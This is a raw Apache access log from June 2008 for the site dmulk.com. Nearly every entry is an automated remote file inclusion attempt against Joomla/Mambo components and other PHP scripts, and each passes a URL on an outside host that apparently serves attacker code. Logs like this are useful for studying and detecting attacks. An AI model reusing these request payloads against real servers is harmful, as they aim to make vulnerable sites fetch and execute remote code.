211.236.180.100 - - [09/Jun/2008:09:19:12 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/Editor/uploaded/img/.tnnac/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:19:18 -0700] "GET /logs/access_071209.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:19:19 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:19:19 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:19:20 -0700] "GET /logs/access_071016.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:19:24 -0700] "GET /logs/access_071225.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:19:24 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:19:25 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:19:25 -0700] "GET /logs/access_071225.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:19:25 -0700] "GET /logs/access_071220.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:19:25 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:19:25 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:19:26 -0700] "GET /logs/access_071220.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:19:27 -0700] "GET /logs/access_080309.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:19:29 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:19:29 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:19:30 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:19:36 -0700] "GET /logs/access_080109.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:19:40 -0700] "GET /logs/access_080201.log/index.php?basepath=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:19:53 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:19:53 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:19:53 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:19:59 -0700] "GET /logs/access_080106.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:20:11 -0700] "GET /logs/access_080201.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:20:11 -0700] "GET /logs/access_080201.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.128.131.80 - - [09/Jun/2008:09:20:14 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [09/Jun/2008:09:20:15 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:20:57 -0700] "GET /logs/access_080106.log/administrator/components/com_extcalendar/admin.extcalendar.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:20:58 -0700] "GET /logs/access_080106.log/administrator/components/com_extcalendar/admin.extcalendar.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.163.166 - - [09/Jun/2008:09:21:06 -0700] "GET /logs/access_080106.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:21:12 -0700] "GET /logs/access_080328.log///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:21:15 -0700] "GET ///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 200 16943 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:21:16 -0700] "GET /logs///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:21:31 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [09/Jun/2008:09:21:31 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [09/Jun/2008:09:21:31 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:21:37 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:21:37 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:21:38 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:21:38 -0700] "GET /logs/access_080331.log///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:21:50 -0700] "GET /logs/access_080106.log/administrator/components/com_extcalendar/admin.extcalendar.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:21:51 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:21:54 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:21:58 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:21:59 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:22:00 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.128.59.36 - - [09/Jun/2008:09:22:15 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.imgshost.com/userfiles/c5df6912.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.128.59.36 - - [09/Jun/2008:09:22:15 -0700] "GET /logs/access_080106.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.imgshost.com/userfiles/c5df6912.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
130.242.82.146 - - [09/Jun/2008:09:22:23 -0700] "GET /logs//administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bjork.name.md/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
130.242.82.146 - - [09/Jun/2008:09:22:30 -0700] "GET //administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bjork.name.md/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:23:08 -0700] "GET /index.php?option=com_restaurante&task=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 200 16883 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:23:23 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.144.143.180 - - [09/Jun/2008:09:23:27 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://agenciafederaldebotes.com/~prueba/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.144.143.180 - - [09/Jun/2008:09:23:28 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://agenciafederaldebotes.com/~prueba/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:23:43 -0700] "GET /logs/access_080302.log//site/index.php?option=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:23:43 -0700] "GET //site/index.php?option=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:23:43 -0700] "GET /logs//site/index.php?option=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:23:52 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
130.242.82.146 - - [09/Jun/2008:09:24:02 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://bjork.name.md/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
130.242.82.146 - - [09/Jun/2008:09:24:02 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://bjork.name.md/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:24:16 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:24:16 -0700] "GET /logs/access_080118.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:24:16 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:24:17 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:24:17 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:24:17 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:24:18 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.22.130 - - [09/Jun/2008:09:24:20 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [09/Jun/2008:09:24:20 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.240.31.1 - - [09/Jun/2008:09:24:27 -0700] "GET /logs/access_080121.log//components/com_simpleboard/image_upload.php?sbp=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:24:33 -0700] "GET /logs/access.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:24:34 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:24:34 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:24:37 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 200 16937 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:24:38 -0700] "GET /logs/access_080118.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:24:38 -0700] "GET /logs/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:24:38 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:24:39 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:24:42 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:24:46 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:24:47 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:24:47 -0700] "GET /logs/access_080118.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:24:48 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:24:48 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:24:50 -0700] "GET /logs/access_080223.log/index.php?option=com_restaurante&task=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:24:56 -0700] "GET /logs/access_080507.log/main.php?x=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:24:58 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:24:59 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:25:06 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:25:06 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:25:06 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:25:08 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:25:09 -0700] "GET /logs/access_080106.log//modules/4nAlbum/public/displayCategory.php?basepath=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
130.242.82.146 - - [09/Jun/2008:09:25:11 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://bjork.name.md/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
130.242.82.146 - - [09/Jun/2008:09:25:12 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://bjork.name.md/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:25:22 -0700] "GET /logs/access.log/errors.php?error=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:25:23 -0700] "GET /logs/errors.php?error=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:25:23 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:25:27 -0700] "GET /logs/access_080117.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:25:30 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:25:32 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.144.143.180 - - [09/Jun/2008:09:25:35 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agenciafederaldebotes.com/~prueba/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.144.143.180 - - [09/Jun/2008:09:25:36 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agenciafederaldebotes.com/~prueba/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.144.143.180 - - [09/Jun/2008:09:25:36 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agenciafederaldebotes.com/~prueba/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:25:37 -0700] "GET /logs/access_071225.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:25:38 -0700] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:25:38 -0700] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:25:40 -0700] "GET /logs/access.log/errors.php?error=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:25:40 -0700] "GET /logs/errors.php?error=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:09:25:43 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0005.jpg HTTP/1.1" 200 10997 "-" "Googlebot-Image/1.0" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:25:45 -0700] "GET /logs/access_080123.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.12.149.44 - - [09/Jun/2008:09:25:51 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
